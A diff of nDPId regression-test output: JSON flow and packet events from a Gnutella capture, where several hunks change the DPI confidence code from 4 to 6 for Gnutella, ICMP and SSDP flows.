-00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":174342,"flow_last_seen":287510,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":841,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":174342,"flow_last_seen":287510,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":841,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":28681,"dst_port":49956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287683,"flow_last_seen":287944,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.11.85","src_port":28681,"dst_port":10722,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287683,"flow_last_seen":287944,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.11.85","src_port":28681,"dst_port":10722,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6627,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251763,"flow_last_seen":287316,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":474890,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.204.130.55","src_port":28681,"dst_port":29545,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3762,7 +3762,7 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6791,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":2,"flow_last_seen":490873,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":490873,"pkt":"CAAn5uVZUlQAEjUCCABFAABJEL8AAEARuWtwaTQCCgACD1uicAkANU8DODExAiD\/PoD\/dZiXmj2bAwEBABYAAACiW3BpNAIfAAAAAACAAMOCVVBDAQEB"} 00530{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490916,"flow_last_seen":490916,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":490916,"l3_proto":"ip4","src_ip":"65.182.231.232","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":490916,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":490916,"pkt":"CAAn5uVZUlQAEjUCCABFwABUEMAAAH8B9HtBtufoCgACDwMDMuAAAAAARQAAOFJyAAB\/EbOVCgACD0G25+hwCR7SACTlBTqzMQL2cg0m\/8bpadQ5WwMAAQAFAAAAw4JRS0A="} 
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490916,"flow_last_seen":490916,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":490916,"l3_proto":"ip4","src_ip":"65.182.231.232","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.984965} +00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490916,"flow_last_seen":490916,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":490916,"l3_proto":"ip4","src_ip":"65.182.231.232","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.984965} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6793,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":2,"flow_last_seen":490939,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":490939,"pkt":"CAAn5uVZUlQAEjUCCABFAABJEMEAAEAR+rDfEYQSCgACD1uicAkANcVlg9sxAjy4c4P\/utzozFbSAwEBABYAAACiW98RhBJuAAAA+KYpBMOCVVBDACAf"} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6794,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":2,"flow_last_seen":490991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":490991,"pkt":"CAAn5uVZUlQAEjUCCABFAABKEMIAAEARTyUOyP\/lCgACD5DCcAkANpg9XGQxAgSi0ID\/hbiT8iWZAwEBABcAAADCkA7I\/+WyNgAAAAAgAMOCUUtEGERIlw=="} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6810,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":491496,"flow_last_seen":491496,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":491496,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"23.19.141.110","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -3825,7 +3825,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287355,"flow_last_seen":320291,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.24.129.230","src_port":28681,"dst_port":14766,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287356,"flow_last_seen":320291,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":28681,"dst_port":20387,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287356,"flow_last_seen":320291,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":28681,"dst_port":20387,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":90072,"flow_last_seen":320293,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5333,"flow_avg_l4_payload_len":313,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":90072,"flow_last_seen":320293,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5333,"flow_avg_l4_payload_len":313,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287340,"flow_last_seen":320290,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":28681,"dst_port":14339,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287340,"flow_last_seen":320290,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.41.253","src_port":28681,"dst_port":14339,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287340,"flow_last_seen":320290,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.167.222.160","src_port":28681,"dst_port":56121,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3876,7 +3876,7 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6990,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":287340,"flow_last_seen":320290,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":505793,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":28681,"dst_port":52131,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":520019,"flow_last_seen":520019,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":520019,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50214,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":520019,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":520019,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LsAAAER3F4KAAIP7\/\/\/+sQmB2wAtikITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 
-00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":520019,"flow_last_seen":520019,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":520019,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50214,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":520019,"flow_last_seen":520019,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":520019,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50214,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7131,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":2,"flow_last_seen":521048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":521048,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4LwAAAER3F0KAAIP7\/\/\/+sQmB2wAtikITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7141,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":3,"flow_last_seen":522076,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":522076,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4L0AAAER3FwKAAIP7\/\/\/+sQmB2wAtikITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7268,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":355387,"flow_last_seen":355387,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":536329,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.125.218.84","src_port":28681,"dst_port":17561,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3904,7 +3904,7 @@ 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7398,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":551892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":551892,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0J3oAAIARnW8KAAIPKfk\/yHAJWDYAIF+oR05EEECHAQFUC1FLUlAGUk5BXS\/iNQlw"} 00528{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":552011,"flow_last_seen":552011,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":552011,"l3_proto":"ip4","src_ip":"154.3.42.209","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":552011,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":552011,"pkt":"CAAn5uVZUlQAEjUCCABFwABQEicAAH8BV+OaAyrRCgACDwMDzhEAAAAARQAANH78AAB\/EevZCgACD5oDKtFwCRjKACBD\/UdORBBAiwEBVAtRS1JQBlJOQV0v4jUJcA=="} 
-00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":552011,"flow_last_seen":552011,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":552011,"l3_proto":"ip4","src_ip":"154.3.42.209","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.209868} +00606{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":552011,"flow_last_seen":552011,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":552011,"l3_proto":"ip4","src_ip":"154.3.42.209","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.209868} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82063,"flow_last_seen":373495,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":554967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"177.231.151.16","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82063,"flow_last_seen":373495,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":554967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"177.231.151.16","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82063,"flow_last_seen":371839,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":554967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.153.143.54","src_port":28681,"dst_port":65535,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3915,24 +3915,24 @@ 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":7421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":373494,"flow_last_seen":551890,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":554967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.100.68.255","src_port":28681,"dst_port":12838,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7429,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251734,"flow_last_seen":381404,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":568531,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"129.45.47.167","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7429,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":251734,"flow_last_seen":381404,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":568531,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"129.45.47.167","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7439,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":400872,"flow_last_seen":400901,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":581778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7439,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":399168,"flow_last_seen":399265,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":581778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00666{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":7439,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":400018,"flow_last_seen":403044,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":581778,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":50213,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 